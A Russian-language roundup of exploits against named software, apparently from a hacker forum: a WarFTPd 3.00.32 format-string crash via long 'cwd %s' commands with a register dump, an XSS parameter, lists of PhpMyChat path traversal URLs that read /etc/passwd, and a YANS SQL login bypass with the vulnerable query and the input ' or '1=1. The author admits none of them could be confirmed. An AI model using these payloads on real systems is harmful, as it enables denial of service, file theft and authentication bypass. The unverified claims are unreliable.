Уязвимость:
Продукт подвержен переполнению буфера, когда отправляются команды
большой длины с символами "%s" внутри. Это выглядит, как невыполняемый,
содержащий ошибки запрос, однако он выполнится и приведёт к зависанию
системы.
При крахе сервера выдаёт ошибку:
EAX 00000001
ECX 00000073
EDX 00000002
EBX 0079E890
ESP 0079E7A0
EBP 00A55A8A ASCII
"s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s(...more %s
characters)"
ESI 0079E7DE
EDI 0000000A
EIP 00431540 war-ftpd.00431540
00431540 8A08 MOV CL,BYTE PTR DS:[EAX]
Достаточно одного запроса и обрываются все операции с файлами.
Использование:$ ftp target
(Banner)
ftp> quote user anonymous
ftp> quote pass bla
ftp> cwd %s*256
или
ftp> cdup %s*256
Комментарий::
Проверить справедливость этой уязвимости не получилось.
ПО: WARFTPd
Версия: 3.00.32
Использование: www.Site.com/[support Path]/index.php?=[xss] Комментарий::
Проверив в Рунете возможность выполнения команды
index.php=<script>alert('test')</script> ничего не добился. Не
исключаю возможность применения маскировки для более эффективной
работы.
ПО: PhpMyChat Plus
Версия: 1.9
Использование: http://target.com/path/avatar.php?ChatPath=../../etc/passwd
http://target.com/path/colorhelp_popup.php?ChatPath=../../etc/passwd
http://target.com/path/color_popup.php?ChatPath=../../etc/passwd
http://target.com/path/index.php?ChatPath=../../etc/passwd
http://target.com/path/lib/connected_users.lib.php?ChatPath=../../etc/passwd
http://target.com/path/avatar.php?ChatPath=../../etc/passwd
http://target.com/path/lib/index.lib.php?ChatPath=../../etc/passwd
http://target.com/path/logs.php?L=../../etc/passwd
http://target.com/path/phpMyChat.php3?ChatPath=../../etc/passwd Комментарий::
Провозился с этой уязвимостью около 2 часов, ничего не дало. Зато нашёл
возможность раскрыть путь продукта.
ПО: PhpMyChat
Версия: 0.14.5
Использование: http://target.com/path/localization/languages.lib.php3?ChatPath=../../etc/passwd Комментарий::
Провозился с этой уязвимостью около 2 часов, ничего не дало. Зато нашёл
возможность раскрыть путь продукта.
ПО: YANS
Уязвимый код:
$resultado = mysql_query("SELECT * FROM users WHERE username='$username'
AND password='$password'") or die (mysql_error()); Использвание:
В поля авторизации ведите - ' or '1=1 Комментарий::
Проверить не удалось по банальной причине - нет сайтов использующих эту
систему.